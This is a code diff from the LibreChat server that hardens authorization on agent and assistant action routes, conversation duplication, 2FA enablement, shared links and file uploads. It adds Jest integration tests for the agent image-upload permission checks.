let app;
|
||||||
|
const { deleteMessages } = require('~/models');
|
||||||
|
|
||||||
|
const authenticatedUserId = 'user-owner-123';
|
||||||
|
|
||||||
|
beforeAll(() => {
|
||||||
|
const messagesRouter = require('../messages');
|
||||||
|
|
||||||
|
app = express();
|
||||||
|
app.use(express.json());
|
||||||
|
app.use((req, res, next) => {
|
||||||
|
req.user = { id: authenticatedUserId };
|
||||||
|
next();
|
||||||
|
});
|
||||||
|
app.use('/api/messages', messagesRouter);
|
||||||
|
});
|
||||||
|
|
||||||
|
beforeEach(() => {
|
||||||
|
jest.clearAllMocks();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should pass user and conversationId in the deleteMessages filter', async () => {
|
||||||
|
deleteMessages.mockResolvedValue({ deletedCount: 1 });
|
||||||
|
|
||||||
|
await request(app).delete('/api/messages/convo-1/msg-1');
|
||||||
|
|
||||||
|
expect(deleteMessages).toHaveBeenCalledTimes(1);
|
||||||
|
expect(deleteMessages).toHaveBeenCalledWith({
|
||||||
|
messageId: 'msg-1',
|
||||||
|
conversationId: 'convo-1',
|
||||||
|
user: authenticatedUserId,
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return 204 on successful deletion', async () => {
|
||||||
|
deleteMessages.mockResolvedValue({ deletedCount: 1 });
|
||||||
|
|
||||||
|
const response = await request(app).delete('/api/messages/convo-1/msg-owned');
|
||||||
|
|
||||||
|
expect(response.status).toBe(204);
|
||||||
|
expect(deleteMessages).toHaveBeenCalledWith({
|
||||||
|
messageId: 'msg-owned',
|
||||||
|
conversationId: 'convo-1',
|
||||||
|
user: authenticatedUserId,
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return 500 when deleteMessages throws', async () => {
|
||||||
|
deleteMessages.mockRejectedValue(new Error('DB failure'));
|
||||||
|
|
||||||
|
const response = await request(app).delete('/api/messages/convo-1/msg-1');
|
||||||
|
|
||||||
|
expect(response.status).toBe(500);
|
||||||
|
expect(response.body).toEqual({ error: 'Internal server error' });
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
@ -143,6 +143,9 @@ router.post(
|
||||||
|
|
||||||
if (actions_result && actions_result.length) {
|
if (actions_result && actions_result.length) {
|
||||||
const action = actions_result[0];
|
const action = actions_result[0];
|
||||||
|
if (action.agent_id !== agent_id) {
|
||||||
|
return res.status(403).json({ message: 'Action does not belong to this agent' });
|
||||||
|
}
|
||||||
metadata = { ...action.metadata, ...metadata };
|
metadata = { ...action.metadata, ...metadata };
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
@ -184,7 +187,7 @@ router.post(
|
||||||
}
|
}
|
||||||
|
|
||||||
/** @type {[Action]} */
|
/** @type {[Action]} */
|
||||||
const updatedAction = await updateAction({ action_id }, actionUpdateData);
|
const updatedAction = await updateAction({ action_id, agent_id }, actionUpdateData);
|
||||||
|
|
||||||
const sensitiveFields = ['api_key', 'oauth_client_id', 'oauth_client_secret'];
|
const sensitiveFields = ['api_key', 'oauth_client_id', 'oauth_client_secret'];
|
||||||
for (let field of sensitiveFields) {
|
for (let field of sensitiveFields) {
|
||||||
|
|
@ -251,7 +254,13 @@ router.delete(
|
||||||
{ tools: updatedTools, actions: updatedActions },
|
{ tools: updatedTools, actions: updatedActions },
|
||||||
{ updatingUserId: req.user.id, forceVersion: true },
|
{ updatingUserId: req.user.id, forceVersion: true },
|
||||||
);
|
);
|
||||||
await deleteAction({ action_id });
|
const deleted = await deleteAction({ action_id, agent_id });
|
||||||
|
if (!deleted) {
|
||||||
|
logger.warn('[Agent Action Delete] No matching action document found', {
|
||||||
|
action_id,
|
||||||
|
agent_id,
|
||||||
|
});
|
||||||
|
}
|
||||||
res.status(200).json({ message: 'Action deleted successfully' });
|
res.status(200).json({ message: 'Action deleted successfully' });
|
||||||
} catch (error) {
|
} catch (error) {
|
||||||
const message = 'Trouble deleting the Agent Action';
|
const message = 'Trouble deleting the Agent Action';
|
||||||
|
|
|
||||||
|
|
@ -76,43 +76,21 @@ router.get('/chat/stream/:streamId', async (req, res) => {
|
||||||
|
|
||||||
logger.debug(`[AgentStream] Client subscribed to ${streamId}, resume: ${isResume}`);
|
logger.debug(`[AgentStream] Client subscribed to ${streamId}, resume: ${isResume}`);
|
||||||
|
|
||||||
// Send sync event with resume state for ALL reconnecting clients
|
const writeEvent = (event) => {
|
||||||
// This supports multi-tab scenarios where each tab needs run step data
|
if (!res.writableEnded) {
|
||||||
if (isResume) {
|
res.write(`event: message\ndata: ${JSON.stringify(event)}\n\n`);
|
||||||
const resumeState = await GenerationJobManager.getResumeState(streamId);
|
|
||||||
if (resumeState && !res.writableEnded) {
|
|
||||||
// Send sync event with run steps AND aggregatedContent
|
|
||||||
// Client will use aggregatedContent to initialize message state
|
|
||||||
res.write(`event: message\ndata: ${JSON.stringify({ sync: true, resumeState })}\n\n`);
|
|
||||||
if (typeof res.flush === 'function') {
|
if (typeof res.flush === 'function') {
|
||||||
res.flush();
|
res.flush();
|
||||||
}
|
}
|
||||||
logger.debug(
|
|
||||||
`[AgentStream] Sent sync event for ${streamId} with ${resumeState.runSteps.length} run steps`,
|
|
||||||
);
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
};
|
||||||
|
|
||||||
const result = await GenerationJobManager.subscribe(
|
const onDone = (event) => {
|
||||||
streamId,
|
writeEvent(event);
|
||||||
(event) => {
|
|
||||||
if (!res.writableEnded) {
|
|
||||||
res.write(`event: message\ndata: ${JSON.stringify(event)}\n\n`);
|
|
||||||
if (typeof res.flush === 'function') {
|
|
||||||
res.flush();
|
|
||||||
}
|
|
||||||
}
|
|
||||||
},
|
|
||||||
(event) => {
|
|
||||||
if (!res.writableEnded) {
|
|
||||||
res.write(`event: message\ndata: ${JSON.stringify(event)}\n\n`);
|
|
||||||
if (typeof res.flush === 'function') {
|
|
||||||
res.flush();
|
|
||||||
}
|
|
||||||
res.end();
|
res.end();
|
||||||
}
|
};
|
||||||
},
|
|
||||||
(error) => {
|
const onError = (error) => {
|
||||||
if (!res.writableEnded) {
|
if (!res.writableEnded) {
|
||||||
res.write(`event: error\ndata: ${JSON.stringify({ error })}\n\n`);
|
res.write(`event: error\ndata: ${JSON.stringify({ error })}\n\n`);
|
||||||
if (typeof res.flush === 'function') {
|
if (typeof res.flush === 'function') {
|
||||||
|
|
@ -120,8 +98,40 @@ router.get('/chat/stream/:streamId', async (req, res) => {
|
||||||
}
|
}
|
||||||
res.end();
|
res.end();
|
||||||
}
|
}
|
||||||
},
|
};
|
||||||
|
|
||||||
|
let result;
|
||||||
|
|
||||||
|
if (isResume) {
|
||||||
|
const { subscription, resumeState, pendingEvents } =
|
||||||
|
await GenerationJobManager.subscribeWithResume(streamId, writeEvent, onDone, onError);
|
||||||
|
|
||||||
|
if (!res.writableEnded) {
|
||||||
|
if (resumeState) {
|
||||||
|
res.write(
|
||||||
|
`event: message\ndata: ${JSON.stringify({ sync: true, resumeState, pendingEvents })}\n\n`,
|
||||||
);
|
);
|
||||||
|
if (typeof res.flush === 'function') {
|
||||||
|
res.flush();
|
||||||
|
}
|
||||||
|
GenerationJobManager.markSyncSent(streamId);
|
||||||
|
logger.debug(
|
||||||
|
`[AgentStream] Sent sync event for ${streamId} with ${resumeState.runSteps.length} run steps, ${pendingEvents.length} pending events`,
|
||||||
|
);
|
||||||
|
} else if (pendingEvents.length > 0) {
|
||||||
|
for (const event of pendingEvents) {
|
||||||
|
writeEvent(event);
|
||||||
|
}
|
||||||
|
logger.warn(
|
||||||
|
`[AgentStream] Resume state null for ${streamId}, replayed ${pendingEvents.length} gap events directly`,
|
||||||
|
);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
result = subscription;
|
||||||
|
} else {
|
||||||
|
result = await GenerationJobManager.subscribe(streamId, writeEvent, onDone, onError);
|
||||||
|
}
|
||||||
|
|
||||||
if (!result) {
|
if (!result) {
|
||||||
return res.status(404).json({ error: 'Failed to subscribe to stream' });
|
return res.status(404).json({ error: 'Failed to subscribe to stream' });
|
||||||
|
|
|
||||||
|
|
@ -117,7 +117,7 @@ router.post(
|
||||||
'/:id/duplicate',
|
'/:id/duplicate',
|
||||||
checkAgentCreate,
|
checkAgentCreate,
|
||||||
canAccessAgentResource({
|
canAccessAgentResource({
|
||||||
requiredPermission: PermissionBits.VIEW,
|
requiredPermission: PermissionBits.EDIT,
|
||||||
resourceIdParam: 'id',
|
resourceIdParam: 'id',
|
||||||
}),
|
}),
|
||||||
v1.duplicateAgent,
|
v1.duplicateAgent,
|
||||||
|
|
|
||||||
|
|
@ -60,6 +60,9 @@ router.post('/:assistant_id', async (req, res) => {
|
||||||
|
|
||||||
if (actions_result && actions_result.length) {
|
if (actions_result && actions_result.length) {
|
||||||
const action = actions_result[0];
|
const action = actions_result[0];
|
||||||
|
if (action.assistant_id !== assistant_id) {
|
||||||
|
return res.status(403).json({ message: 'Action does not belong to this assistant' });
|
||||||
|
}
|
||||||
metadata = { ...action.metadata, ...metadata };
|
metadata = { ...action.metadata, ...metadata };
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
@ -117,7 +120,7 @@ router.post('/:assistant_id', async (req, res) => {
|
||||||
// For new actions, use the assistant owner's user ID
|
// For new actions, use the assistant owner's user ID
|
||||||
actionUpdateData.user = assistant_user || req.user.id;
|
actionUpdateData.user = assistant_user || req.user.id;
|
||||||
}
|
}
|
||||||
promises.push(updateAction({ action_id }, actionUpdateData));
|
promises.push(updateAction({ action_id, assistant_id }, actionUpdateData));
|
||||||
|
|
||||||
/** @type {[AssistantDocument, Action]} */
|
/** @type {[AssistantDocument, Action]} */
|
||||||
let [assistantDocument, updatedAction] = await Promise.all(promises);
|
let [assistantDocument, updatedAction] = await Promise.all(promises);
|
||||||
|
|
@ -196,9 +199,15 @@ router.delete('/:assistant_id/:action_id/:model', async (req, res) => {
|
||||||
assistantUpdateData.user = req.user.id;
|
assistantUpdateData.user = req.user.id;
|
||||||
}
|
}
|
||||||
promises.push(updateAssistantDoc({ assistant_id }, assistantUpdateData));
|
promises.push(updateAssistantDoc({ assistant_id }, assistantUpdateData));
|
||||||
promises.push(deleteAction({ action_id }));
|
promises.push(deleteAction({ action_id, assistant_id }));
|
||||||
|
|
||||||
await Promise.all(promises);
|
const [, deletedAction] = await Promise.all(promises);
|
||||||
|
if (!deletedAction) {
|
||||||
|
logger.warn('[Assistant Action Delete] No matching action document found', {
|
||||||
|
action_id,
|
||||||
|
assistant_id,
|
||||||
|
});
|
||||||
|
}
|
||||||
res.status(200).json({ message: 'Action deleted successfully' });
|
res.status(200).json({ message: 'Action deleted successfully' });
|
||||||
} catch (error) {
|
} catch (error) {
|
||||||
const message = 'Trouble deleting the Assistant Action';
|
const message = 'Trouble deleting the Assistant Action';
|
||||||
|
|
|
||||||
|
|
@ -63,7 +63,7 @@ router.post(
|
||||||
resetPasswordController,
|
resetPasswordController,
|
||||||
);
|
);
|
||||||
|
|
||||||
router.get('/2fa/enable', middleware.requireJwtAuth, enable2FA);
|
router.post('/2fa/enable', middleware.requireJwtAuth, enable2FA);
|
||||||
router.post('/2fa/verify', middleware.requireJwtAuth, verify2FA);
|
router.post('/2fa/verify', middleware.requireJwtAuth, verify2FA);
|
||||||
router.post('/2fa/verify-temp', middleware.checkBan, verify2FAWithTempToken);
|
router.post('/2fa/verify-temp', middleware.checkBan, verify2FAWithTempToken);
|
||||||
router.post('/2fa/confirm', middleware.requireJwtAuth, confirm2FA);
|
router.post('/2fa/confirm', middleware.requireJwtAuth, confirm2FA);
|
||||||
|
|
|
||||||
|
|
@ -16,9 +16,7 @@ const sharedLinksEnabled =
|
||||||
process.env.ALLOW_SHARED_LINKS === undefined || isEnabled(process.env.ALLOW_SHARED_LINKS);
|
process.env.ALLOW_SHARED_LINKS === undefined || isEnabled(process.env.ALLOW_SHARED_LINKS);
|
||||||
|
|
||||||
const publicSharedLinksEnabled =
|
const publicSharedLinksEnabled =
|
||||||
sharedLinksEnabled &&
|
sharedLinksEnabled && isEnabled(process.env.ALLOW_SHARED_LINKS_PUBLIC);
|
||||||
(process.env.ALLOW_SHARED_LINKS_PUBLIC === undefined ||
|
|
||||||
isEnabled(process.env.ALLOW_SHARED_LINKS_PUBLIC));
|
|
||||||
|
|
||||||
const sharePointFilePickerEnabled = isEnabled(process.env.ENABLE_SHAREPOINT_FILEPICKER);
|
const sharePointFilePickerEnabled = isEnabled(process.env.ENABLE_SHAREPOINT_FILEPICKER);
|
||||||
const openidReuseTokens = isEnabled(process.env.OPENID_REUSE_TOKENS);
|
const openidReuseTokens = isEnabled(process.env.OPENID_REUSE_TOKENS);
|
||||||
|
|
|
||||||
|
|
@ -1,7 +1,7 @@
|
||||||
const multer = require('multer');
|
const multer = require('multer');
|
||||||
const express = require('express');
|
const express = require('express');
|
||||||
const { sleep } = require('@librechat/agents');
|
const { sleep } = require('@librechat/agents');
|
||||||
const { isEnabled } = require('@librechat/api');
|
const { isEnabled, resolveImportMaxFileSize } = require('@librechat/api');
|
||||||
const { logger } = require('@librechat/data-schemas');
|
const { logger } = require('@librechat/data-schemas');
|
||||||
const { CacheKeys, EModelEndpoint } = require('librechat-data-provider');
|
const { CacheKeys, EModelEndpoint } = require('librechat-data-provider');
|
||||||
const {
|
const {
|
||||||
|
|
@ -224,8 +224,27 @@ router.post('/update', validateConvoAccess, async (req, res) => {
|
||||||
});
|
});
|
||||||
|
|
||||||
const { importIpLimiter, importUserLimiter } = createImportLimiters();
|
const { importIpLimiter, importUserLimiter } = createImportLimiters();
|
||||||
|
/** Fork and duplicate share one rate-limit budget (same "clone" operation class) */
|
||||||
const { forkIpLimiter, forkUserLimiter } = createForkLimiters();
|
const { forkIpLimiter, forkUserLimiter } = createForkLimiters();
|
||||||
const upload = multer({ storage: storage, fileFilter: importFileFilter });
|
const importMaxFileSize = resolveImportMaxFileSize();
|
||||||
|
const upload = multer({
|
||||||
|
storage,
|
||||||
|
fileFilter: importFileFilter,
|
||||||
|
limits: { fileSize: importMaxFileSize },
|
||||||
|
});
|
||||||
|
const uploadSingle = upload.single('file');
|
||||||
|
|
||||||
|
function handleUpload(req, res, next) {
|
||||||
|
uploadSingle(req, res, (err) => {
|
||||||
|
if (err && err.code === 'LIMIT_FILE_SIZE') {
|
||||||
|
return res.status(413).json({ message: 'File exceeds the maximum allowed size' });
|
||||||
|
}
|
||||||
|
if (err) {
|
||||||
|
return next(err);
|
||||||
|
}
|
||||||
|
next();
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Imports a conversation from a JSON file and saves it to the database.
|
* Imports a conversation from a JSON file and saves it to the database.
|
||||||
|
|
@ -238,7 +257,7 @@ router.post(
|
||||||
importIpLimiter,
|
importIpLimiter,
|
||||||
importUserLimiter,
|
importUserLimiter,
|
||||||
configMiddleware,
|
configMiddleware,
|
||||||
upload.single('file'),
|
handleUpload,
|
||||||
async (req, res) => {
|
async (req, res) => {
|
||||||
try {
|
try {
|
||||||
/* TODO: optimize to return imported conversations and add manually */
|
/* TODO: optimize to return imported conversations and add manually */
|
||||||
|
|
@ -280,7 +299,7 @@ router.post('/fork', forkIpLimiter, forkUserLimiter, async (req, res) => {
|
||||||
}
|
}
|
||||||
});
|
});
|
||||||
|
|
||||||
router.post('/duplicate', async (req, res) => {
|
router.post('/duplicate', forkIpLimiter, forkUserLimiter, async (req, res) => {
|
||||||
const { conversationId, title } = req.body;
|
const { conversationId, title } = req.body;
|
||||||
|
|
||||||
try {
|
try {
|
||||||
|
|
|
||||||
|
|
@ -2,12 +2,12 @@ const fs = require('fs').promises;
|
||||||
const express = require('express');
|
const express = require('express');
|
||||||
const { EnvVar } = require('@librechat/agents');
|
const { EnvVar } = require('@librechat/agents');
|
||||||
const { logger } = require('@librechat/data-schemas');
|
const { logger } = require('@librechat/data-schemas');
|
||||||
|
const { verifyAgentUploadPermission } = require('@librechat/api');
|
||||||
const {
|
const {
|
||||||
Time,
|
Time,
|
||||||
isUUID,
|
isUUID,
|
||||||
CacheKeys,
|
CacheKeys,
|
||||||
FileSources,
|
FileSources,
|
||||||
SystemRoles,
|
|
||||||
ResourceType,
|
ResourceType,
|
||||||
EModelEndpoint,
|
EModelEndpoint,
|
||||||
PermissionBits,
|
PermissionBits,
|
||||||
|
|
@ -381,48 +381,15 @@ router.post('/', async (req, res) => {
|
||||||
return await processFileUpload({ req, res, metadata });
|
return await processFileUpload({ req, res, metadata });
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
const denied = await verifyAgentUploadPermission({
|
||||||
* Check agent permissions for permanent agent file uploads (not message attachments).
|
req,
|
||||||
* Message attachments (message_file=true) are temporary files for a single conversation
|
res,
|
||||||
* and should be allowed for users who can chat with the agent.
|
metadata,
|
||||||
* Permanent file uploads to tool_resources require EDIT permission.
|
getAgent,
|
||||||
*/
|
checkPermission,
|
||||||
const isMessageAttachment = metadata.message_file === true || metadata.message_file === 'true';
|
|
||||||
if (metadata.agent_id && metadata.tool_resource && !isMessageAttachment) {
|
|
||||||
const userId = req.user.id;
|
|
||||||
|
|
||||||
/** Admin users bypass permission checks */
|
|
||||||
if (req.user.role !== SystemRoles.ADMIN) {
|
|
||||||
const agent = await getAgent({ id: metadata.agent_id });
|
|
||||||
|
|
||||||
if (!agent) {
|
|
||||||
return res.status(404).json({
|
|
||||||
error: 'Not Found',
|
|
||||||
message: 'Agent not found',
|
|
||||||
});
|
});
|
||||||
}
|
if (denied) {
|
||||||
|
return;
|
||||||
/** Check if user is the author or has edit permission */
|
|
||||||
if (agent.author.toString() !== userId) {
|
|
||||||
const hasEditPermission = await checkPermission({
|
|
||||||
userId,
|
|
||||||
role: req.user.role,
|
|
||||||
resourceType: ResourceType.AGENT,
|
|
||||||
resourceId: agent._id,
|
|
||||||
requiredPermission: PermissionBits.EDIT,
|
|
||||||
});
|
|
||||||
|
|
||||||
if (!hasEditPermission) {
|
|
||||||
logger.warn(
|
|
||||||
`[/files] User ${userId} denied upload to agent ${metadata.agent_id} (insufficient permissions)`,
|
|
||||||
);
|
|
||||||
return res.status(403).json({
|
|
||||||
error: 'Forbidden',
|
|
||||||
message: 'Insufficient permissions to upload files to this agent',
|
|
||||||
});
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
|
||||||
return await processAgentFileUpload({ req, res, metadata });
|
return await processAgentFileUpload({ req, res, metadata });
|
||||||
|
|
|
||||||
376
api/server/routes/files/images.agents.test.js
Normal file
376
api/server/routes/files/images.agents.test.js
Normal file
|
|
@ -0,0 +1,376 @@
|
||||||
|
const express = require('express');
|
||||||
|
const request = require('supertest');
|
||||||
|
const mongoose = require('mongoose');
|
||||||
|
const { v4: uuidv4 } = require('uuid');
|
||||||
|
const { createMethods } = require('@librechat/data-schemas');
|
||||||
|
const { MongoMemoryServer } = require('mongodb-memory-server');
|
||||||
|
const {
|
||||||
|
SystemRoles,
|
||||||
|
AccessRoleIds,
|
||||||
|
ResourceType,
|
||||||
|
PrincipalType,
|
||||||
|
} = require('librechat-data-provider');
|
||||||
|
const { createAgent } = require('~/models/Agent');
|
||||||
|
|
||||||
|
jest.mock('~/server/services/Files/process', () => ({
|
||||||
|
processAgentFileUpload: jest.fn().mockImplementation(async ({ res }) => {
|
||||||
|
return res.status(200).json({ message: 'Agent file uploaded', file_id: 'test-file-id' });
|
||||||
|
}),
|
||||||
|
processImageFile: jest.fn().mockImplementation(async ({ res }) => {
|
||||||
|
return res.status(200).json({ message: 'Image processed' });
|
||||||
|
}),
|
||||||
|
filterFile: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('fs', () => {
|
||||||
|
const actualFs = jest.requireActual('fs');
|
||||||
|
return {
|
||||||
|
...actualFs,
|
||||||
|
promises: {
|
||||||
|
...actualFs.promises,
|
||||||
|
unlink: jest.fn().mockResolvedValue(undefined),
|
||||||
|
},
|
||||||
|
};
|
||||||
|
});
|
||||||
|
|
||||||
|
const fs = require('fs');
|
||||||
|
const { processAgentFileUpload } = require('~/server/services/Files/process');
|
||||||
|
|
||||||
|
const router = require('~/server/routes/files/images');
|
||||||
|
|
||||||
|
describe('POST /images - Agent Upload Permission Check (Integration)', () => {
|
||||||
|
let mongoServer;
|
||||||
|
let authorId;
|
||||||
|
let otherUserId;
|
||||||
|
let agentCustomId;
|
||||||
|
let User;
|
||||||
|
let Agent;
|
||||||
|
let AclEntry;
|
||||||
|
let methods;
|
||||||
|
let modelsToCleanup = [];
|
||||||
|
|
||||||
|
beforeAll(async () => {
|
||||||
|
mongoServer = await MongoMemoryServer.create();
|
||||||
|
const mongoUri = mongoServer.getUri();
|
||||||
|
await mongoose.connect(mongoUri);
|
||||||
|
|
||||||
|
const { createModels } = require('@librechat/data-schemas');
|
||||||
|
const models = createModels(mongoose);
|
||||||
|
modelsToCleanup = Object.keys(models);
|
||||||
|
Object.assign(mongoose.models, models);
|
||||||
|
methods = createMethods(mongoose);
|
||||||
|
|
||||||
|
User = models.User;
|
||||||
|
Agent = models.Agent;
|
||||||
|
AclEntry = models.AclEntry;
|
||||||
|
|
||||||
|
await methods.seedDefaultRoles();
|
||||||
|
});
|
||||||
|
|
||||||
|
afterAll(async () => {
|
||||||
|
const collections = mongoose.connection.collections;
|
||||||
|
for (const key in collections) {
|
||||||
|
await collections[key].deleteMany({});
|
||||||
|
}
|
||||||
|
for (const modelName of modelsToCleanup) {
|
||||||
|
if (mongoose.models[modelName]) {
|
||||||
|
delete mongoose.models[modelName];
|
||||||
|
}
|
||||||
|
}
|
||||||
|
await mongoose.disconnect();
|
||||||
|
await mongoServer.stop();
|
||||||
|
});
|
||||||
|
|
||||||
|
beforeEach(async () => {
|
||||||
|
await Agent.deleteMany({});
|
||||||
|
await User.deleteMany({});
|
||||||
|
await AclEntry.deleteMany({});
|
||||||
|
|
||||||
|
authorId = new mongoose.Types.ObjectId();
|
||||||
|
otherUserId = new mongoose.Types.ObjectId();
|
||||||
|
agentCustomId = `agent_${uuidv4().replace(/-/g, '').substring(0, 21)}`;
|
||||||
|
|
||||||
|
await User.create({ _id: authorId, username: 'author', email: 'author@test.com' });
|
||||||
|
await User.create({ _id: otherUserId, username: 'other', email: 'other@test.com' });
|
||||||
|
|
||||||
|
jest.clearAllMocks();
|
||||||
|
});
|
||||||
|
|
||||||
|
const createAppWithUser = (userId, userRole = SystemRoles.USER) => {
|
||||||
|
const app = express();
|
||||||
|
app.use(express.json());
|
||||||
|
app.use((req, _res, next) => {
|
||||||
|
if (req.method === 'POST') {
|
||||||
|
req.file = {
|
||||||
|
originalname: 'test.png',
|
||||||
|
mimetype: 'image/png',
|
||||||
|
size: 100,
|
||||||
|
path: '/tmp/t.png',
|
||||||
|
filename: 'test.png',
|
||||||
|
};
|
||||||
|
req.file_id = uuidv4();
|
||||||
|
}
|
||||||
|
next();
|
||||||
|
});
|
||||||
|
app.use((req, _res, next) => {
|
||||||
|
req.user = { id: userId.toString(), role: userRole };
|
||||||
|
req.app = { locals: {} };
|
||||||
|
req.config = { fileStrategy: 'local', paths: { imageOutput: '/tmp/images' } };
|
||||||
|
next();
|
||||||
|
});
|
||||||
|
app.use('/images', router);
|
||||||
|
return app;
|
||||||
|
};
|
||||||
|
|
||||||
|
it('should return 403 when user has no permission on agent', async () => {
|
||||||
|
await createAgent({
|
||||||
|
id: agentCustomId,
|
||||||
|
name: 'Test Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
author: authorId,
|
||||||
|
});
|
||||||
|
|
||||||
|
const app = createAppWithUser(otherUserId);
|
||||||
|
const response = await request(app).post('/images').send({
|
||||||
|
endpoint: 'agents',
|
||||||
|
agent_id: agentCustomId,
|
||||||
|
tool_resource: 'context',
|
||||||
|
file_id: uuidv4(),
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(response.status).toBe(403);
|
||||||
|
expect(response.body.error).toBe('Forbidden');
|
||||||
|
expect(processAgentFileUpload).not.toHaveBeenCalled();
|
||||||
|
expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png');
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should allow upload for agent owner', async () => {
|
||||||
|
await createAgent({
|
||||||
|
id: agentCustomId,
|
||||||
|
name: 'Test Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
author: authorId,
|
||||||
|
});
|
||||||
|
|
||||||
|
const app = createAppWithUser(authorId);
|
||||||
|
const response = await request(app).post('/images').send({
|
||||||
|
endpoint: 'agents',
|
||||||
|
agent_id: agentCustomId,
|
||||||
|
tool_resource: 'context',
|
||||||
|
file_id: uuidv4(),
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(response.status).toBe(200);
|
||||||
|
expect(processAgentFileUpload).toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should allow upload for admin regardless of ownership', async () => {
|
||||||
|
await createAgent({
|
||||||
|
id: agentCustomId,
|
||||||
|
name: 'Test Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
author: authorId,
|
||||||
|
});
|
||||||
|
|
||||||
|
const app = createAppWithUser(otherUserId, SystemRoles.ADMIN);
|
||||||
|
const response = await request(app).post('/images').send({
|
||||||
|
endpoint: 'agents',
|
||||||
|
agent_id: agentCustomId,
|
||||||
|
tool_resource: 'context',
|
||||||
|
file_id: uuidv4(),
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(response.status).toBe(200);
|
||||||
|
expect(processAgentFileUpload).toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should allow upload for user with EDIT permission', async () => {
|
||||||
|
const agent = await createAgent({
|
||||||
|
id: agentCustomId,
|
||||||
|
name: 'Test Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
author: authorId,
|
||||||
|
});
|
||||||
|
|
||||||
|
const { grantPermission } = require('~/server/services/PermissionService');
|
||||||
|
await grantPermission({
|
||||||
|
principalType: PrincipalType.USER,
|
||||||
|
principalId: otherUserId,
|
||||||
|
resourceType: ResourceType.AGENT,
|
||||||
|
resourceId: agent._id,
|
||||||
|
accessRoleId: AccessRoleIds.AGENT_EDITOR,
|
||||||
|
grantedBy: authorId,
|
||||||
|
});
|
||||||
|
|
||||||
|
const app = createAppWithUser(otherUserId);
|
||||||
|
const response = await request(app).post('/images').send({
|
||||||
|
endpoint: 'agents',
|
||||||
|
agent_id: agentCustomId,
|
||||||
|
tool_resource: 'context',
|
||||||
|
file_id: uuidv4(),
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(response.status).toBe(200);
|
||||||
|
expect(processAgentFileUpload).toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should deny upload for user with only VIEW permission', async () => {
|
||||||
|
const agent = await createAgent({
|
||||||
|
id: agentCustomId,
|
||||||
|
name: 'Test Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
author: authorId,
|
||||||
|
});
|
||||||
|
|
||||||
|
const { grantPermission } = require('~/server/services/PermissionService');
|
||||||
|
await grantPermission({
|
||||||
|
principalType: PrincipalType.USER,
|
||||||
|
principalId: otherUserId,
|
||||||
|
resourceType: ResourceType.AGENT,
|
||||||
|
resourceId: agent._id,
|
||||||
|
accessRoleId: AccessRoleIds.AGENT_VIEWER,
|
||||||
|
grantedBy: authorId,
|
||||||
|
});
|
||||||
|
|
||||||
|
const app = createAppWithUser(otherUserId);
|
||||||
|
const response = await request(app).post('/images').send({
|
||||||
|
endpoint: 'agents',
|
||||||
|
agent_id: agentCustomId,
|
||||||
|
tool_resource: 'context',
|
||||||
|
file_id: uuidv4(),
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(response.status).toBe(403);
|
||||||
|
expect(response.body.error).toBe('Forbidden');
|
||||||
|
expect(processAgentFileUpload).not.toHaveBeenCalled();
|
||||||
|
expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png');
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should skip permission check for regular image uploads without agent_id/tool_resource', async () => {
|
||||||
|
const app = createAppWithUser(otherUserId);
|
||||||
|
const response = await request(app).post('/images').send({
|
||||||
|
endpoint: 'agents',
|
||||||
|
file_id: uuidv4(),
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(response.status).toBe(200);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return 404 for non-existent agent', async () => {
|
||||||
|
const app = createAppWithUser(otherUserId);
|
||||||
|
const response = await request(app).post('/images').send({
|
||||||
|
endpoint: 'agents',
|
||||||
|
agent_id: 'agent_nonexistent123456789',
|
||||||
|
tool_resource: 'context',
|
||||||
|
file_id: uuidv4(),
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(response.status).toBe(404);
|
||||||
|
expect(response.body.error).toBe('Not Found');
|
||||||
|
expect(processAgentFileUpload).not.toHaveBeenCalled();
|
||||||
|
expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png');
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should allow message_file attachment (boolean true) without EDIT permission', async () => {
|
||||||
|
const agent = await createAgent({
|
||||||
|
id: agentCustomId,
|
||||||
|
name: 'Test Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
author: authorId,
|
||||||
|
});
|
||||||
|
|
||||||
|
const { grantPermission } = require('~/server/services/PermissionService');
|
||||||
|
await grantPermission({
|
||||||
|
principalType: PrincipalType.USER,
|
||||||
|
principalId: otherUserId,
|
||||||
|
resourceType: ResourceType.AGENT,
|
||||||
|
resourceId: agent._id,
|
||||||
|
